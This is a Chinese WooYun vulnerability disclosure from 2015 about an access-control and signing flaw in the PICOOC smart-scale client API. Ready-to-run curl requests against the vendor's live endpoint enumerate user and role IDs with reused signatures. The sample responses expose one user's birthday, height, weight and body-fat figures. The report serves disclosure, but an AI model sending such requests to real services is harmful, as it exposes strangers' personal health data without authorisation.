当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095319

漏洞标题:有品(PICOOC)智能秤客户端接口设计缺陷可导致用户信息泄漏

相关厂商:有品

漏洞作者: duxins

提交时间:2015-02-03 09:18

修复时间:2015-03-20 09:20

公开时间:2015-03-20 09:20

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

影响所有注册用户

详细说明:

传入 UserID/RoleID 即可查看任意用户的身高体重出生日期等信息
签名计算方式也有问题,只对 timestamp 做了签名验证

curl.png


curl -d reqData='%7B%22method%22%3A%22getRoles%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22userID%22%3A8886%7D%2C%22sign%22%3A%22B8C79E56FAD3A6BAED894F8EAC6C2B42%22%2C%22timestamp%22%3A%221422111111%22%7D' http://www.picooc.com/picooc/interface/
curl -d reqData='%7B%22method%22%3A%22getRoles%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22userID%22%3A9999%7D%2C%22sign%22%3A%22B8C79E56FAD3A6BAED894F8EAC6C2B42%22%2C%22timestamp%22%3A%221422111111%22%7D' http://www.picooc.com/picooc/interface/
curl -d reqData=%7B%22method%22%3A%22getLatestBodyIndex%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22roleId%22%3A18306%7D%2C%22sign%22%3A%22DF7E58BD54A17625D53221CD519E837E%22%2C%22timestamp%22%3A%221422859378%22%7D http://www.picooc.com/picooc/interface/


返回结果:

{"method":"getRoles","result":{"code":"0","message":"\u83b7\u53d6\u89d2\u8272\u4fe1\u606f\u6210\u529f\uff01"},"resp":{"roles":[{"roleID":"16454","name":"****","height":"1.68","sex":"1","birthday":"1974-10-13","server_time":"1392443421","user_id":"8888","head_protail_url":"","gole_weight":"65.0","picooc_index_accumulate":"0","goal_fat":"20.6","time":"1392443776","first_weight":"67.0","first_fat":"22.5","first_use_time":"1392443613","change_goal_weight_time":"1392443776","weight_change_target":"-1.2","is_remote":0,"alias_name":"","email":"","phoneNumber":"","role_infos":[{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.2","goal_fat":"20.2","time":"1392443414","change_goal_weight_time":"1392443674","role_id":"16454","weight_change_target":"-1.2"},{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.2","goal_fat":"20.2","time":"1392443414","change_goal_weight_time":"1392443674","role_id":"16454","weight_change_target":"-1.2"},{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.0","goal_fat":"20.6","time":"1392443414","change_goal_weight_time":"1392443776","role_id":"16454","weight_change_target":"-1.2"}]}],"myUserId":8888}}
{"method":"getLatestBodyIndex","result":{"code":"0","message":"\u83b7\u53d6\u89d2\u8272\u6d4b\u91cf\u6570\u636e\u6210\u529f"},"resp":{"amount":1,"bodyIndexs":[{"1":18308,"2":"81.2","3":"23.4","4":"27.1","5":"9","6":"72.8","7":"56.7","8":"31","9":"3.1","10":"1713","11":1422570216,"12":1422570215,"13":"0.0","14":"5247831"}]}}

漏洞证明:

修复方案:

版权声明:转载请注明来源 duxins@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论

  1. 2015-02-03 14:00 | Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)

    会泄漏 @肉肉 体重吗(⊙o⊙) 

  2. 2015-02-03 18:57 | 肉肉 认证白帽子 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)

    @Woodee 对于体重不过百的我来说体重这种数据随意泄露好了,2333

  3. 2015-03-23 11:35 | 静默 ( 路人 | Rank:8 漏洞数:6 | 安全小白)

    @肉肉 难道你没听说过,身高不过百,不是平胸就是矮么